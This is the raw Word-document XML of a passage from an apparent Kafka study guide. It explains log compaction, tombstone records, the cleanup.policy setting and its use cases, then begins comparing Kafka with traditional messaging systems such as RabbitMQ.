    <w:p w14:paraId="41E89A07" w14:textId="273C6BD4" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="003C01E6" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="844" w:name="_Toc197868058"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Kafka’s log compaction feature</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="844"/>
    </w:p>
    <w:p w14:paraId="07CAA57D" w14:textId="3F9BA139" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E1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Feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B66B5"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AA21128"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Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678F57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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional Kafka retention is time-based or size-based, where messages are retained for a certain amount of time or until the log reaches a certain size. After this, older messages are deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E7A9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D72378"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If a message for a key is marked as "tombstone" (a message with a null value), it will delete all prior records with that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D9DC7"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Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To enable log compaction, you need to set the cleanup.policy of a topic to compact. This is typically done when creating or altering a topic in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180AC701"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enabling log compaction on a topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70813C24"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partitions 3 --config cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED158F"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Deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A60D8C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retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, data is deleted based on age or size limits, regardless of the key, meaning the entire log could be deleted even if the last version of a record is still relevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1F0E0"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 for Log Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A28C2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Useful in event-driven architectures where only the latest state of an entity (e.g., user, device) is important, and the system keeps updating that state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE798A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intaining State</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For applications where Kafka is used as a source of truth for storing the latest state of various entities. For example, a stock price system might keep only the most recent price for each stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7E21C"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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A cache system where stale cache values need to be cleaned up automatically and only the most recent value for each cache key is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A22C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Process</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E57853"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action can occur at different times based on system load and configuration. Kafka compacts logs in segments, and once a segment has been compacted, only the latest value for each key remains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9D8F2"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in Action</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC45F4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agine you have the following messages for a key user1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74881CC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0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5E7E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1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E2D1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2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F55ABF"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with age 32) will remain, and older versions will be discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7277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0CA2683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message with a null value that Kafka uses to mark a key as deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84A0E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like user1 -&gt; null is sent, Kafka will compact the logs and remove all the previous records associated with user1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CB99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helps in cases where the entity (for example, a user or a product) is no longer required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08DE9A"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Log Compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28508074"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ce Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It prevents the accumulation of redundant records for the same key, reducing disk usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335CB90F"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r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for tracking only the latest state of an entity, like in event sourcing systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073442E7"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isk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By keeping only the latest record for each key, Kafka reduces the amount of I/O operations needed to read through old records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF75235"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7D19C797"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4AFEF7"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user1 -&gt; {name: Alice, age: 25}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424577E"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user1 -&gt; {name: Alice, age: 26}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D7016"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user1 -&gt; {name: Alice, age: 27}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01EABD"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user1 -&gt; {name: Alice, age: 27} record will remain in the log for that user, saving space and ensuring that consumers only read the latest profile data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9719F9"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8CC199B"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CE4B95"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400" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F504B" w14:textId="215FF4A9"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45" w:name="_Toc197868059"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain log compaction in Kafka, how it helps manage the log size, and the use cases for log compaction</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="845"/>
    </w:p>
    <w:p w14:paraId="02420C80" w14:textId="78A51FF0" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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Overview and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE63942"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Log Compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10010358"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topics are divided into partitions, and each partition consists of multiple log segments. Log compaction works at the level of these log segments, which are periodically cleaned and compacted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA108D"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vs. Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89B2E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Traditional retention in Kafka is based on time or size, meaning records are deleted after a certain period or when a partition exceeds a certain size, regardless of their content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA26020"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Log compaction, on the other hand, retains only the latest record for each key. Older records with the same key are discarded, helping to reduce storage requirements without losing important data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E9BA5"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3EB5D19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Compaction Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C8AF1"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will retain only the most recent message for each key, based on the latest value for that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B2B14"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compaction runs, Kafka checks all records in a log segment and keeps the latest record for each key. Older versions of the same key are removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030447B"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with a null value (tombstone record) is sent for a key, Kafka will eventually remove all previous records with that key during the compaction process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFEE9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Log Compaction Helps Manage Log Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30D5E9"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fficient Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B0C91"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intenance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED0FE8D"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3077DDCC"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log compaction removes old versions of records, the size of Kafka logs decreases, reducing the amount of data that consumers need to process and improving overall system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184AA50"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ptimized for Event-Driven Architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59867250"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Cases for Log Compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F172B05"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76DA23E6"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event-driven architectures or </w:t>
      </w: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Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E267D23"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tateful applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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e Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60858888"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Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FFD3D"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cking System States</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611201B"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Log Compaction in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC5E71E"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o enable log compaction for a Kafka topic, you need to set the topic’s cleanup.policy to compact. Here’s how you can create a topic with log compaction enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40427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create --topic &lt;topic-name&gt; --partitions 3 --replication-factor 1 --config cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F429D88"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topic already exists, you can alter its configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A23D20"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config cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FE2D8"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og Compaction Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E59BA"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writes data into log segments. When a segment reaches a certain size, it is closed, and a new segment is started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56450591"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Kafka periodically runs a background process to compact log segments. During this process, older versions of records for a specific key are discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F37314"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of Compacted Records</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once log compaction is completed, only the latest value for each key remains in the compacted log. In the case of a tombstone (null value), all records for that key are removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06929339"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mpaction vs. Deletion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402693BA"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etion</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows data to be deleted after a certain period or once the partition reaches a specific size using the retention policy. This can remove records regardless of their key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE0BE2"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however, only removes the older versions of a record for the same key, preserving the most recent value. Compaction is key-based, and you always retain the last state for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A9141"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21432E4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product1 -&gt; {quantity: 100}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72508050"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product1 -&gt; {quantity: 90}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155775DA"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product1 -&gt; {quantity: 80}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750D82D"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product1 -&gt; {quantity: 80} will remain, and the previous updates will be discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382281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48C9DB"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CE4B95"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401" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01416D" w14:textId="305AFB2C"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46" w:name="_Toc197868060"/>
      <w:r w:rsidRPr="00CE4B9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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="846"/>
    </w:p>
    <w:p w14:paraId="51DF860D" w14:textId="77494855" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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vs. Traditional Messaging Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072671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03272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>architectur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message dur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68CE884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Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EF9B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2ECEA6DE"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and Decentralized</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka is designed to be horizontally scalable and fault-tolerant. It operates in a distributed manner where multiple brokers work together in a Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E44DC4"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Client Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers manage topics, partitions, and message storage. Producers send messages to topics, while consumers subscribe to topics to process the messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79883E1A"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and Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka organizes messages into topics, and each topic can have multiple partitions. These partitions allow Kafka to scale horizontally, distributing data across different servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC36CD8"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provides replication within a cluster, ensuring fault tolerance. Each partition can have replicas distributed across multiple brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36338EFC"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3011E67"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or Simple Broker Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Queue-Topic Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional systems typically use either queues (for point-to-point messaging) or topics (for pub/sub messaging), but scaling them can be more complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F2B5F"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Some traditional messaging systems (like RabbitMQ) provide limited support for message partitioning, but it is not as sophisticated or scalable as Kafka's partitioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F9B80"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ssage Durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D5BFD"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1E3EAE43"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rable Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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based Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses a log-based storage mechanism. Messages are appended to logs, and the logs are retained for a configurable retention period. Consumers can read from any point in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C6BE0"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Acknowledgment</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows producers and consumers to configure the level of acknowledgment needed for message delivery (e.g., at-most-once, at-least-once, exactly-once delivery semantics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73933EE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2E0E52E"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Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional systems like RabbitMQ and ActiveMQ also provide message durability options, but they tend to use more conventional approaches to storing messages (e.g., databases or queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4F7A5"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In many traditional systems, once a message is consumed, it is deleted from the queue, and messages are typically not stored for long-term durability unless explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A47A5"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Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB514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4CA879B"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rizontal Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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replicates data across multiple brokers for fault tolerance and availability, enabling it to scale without compromising data durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A996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385CF2E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Vertical Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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While some systems like RabbitMQ allow message partitioning across multiple queues, scaling is often more difficult and doesn’t provide the level of granular control that Kafka provides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9ED0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and Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some traditional systems provide replication (e.g., ActiveMQ, RabbitMQ), but it is usually less efficient and less flexible compared to Kafka’s partitioning and replication approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96CF82"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erformance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA356EA"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74A1AA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Compression</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka supports message compression (e.g., gzip, snappy), which helps in reducing storage costs and improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21A6F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ero-Copy Technology</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
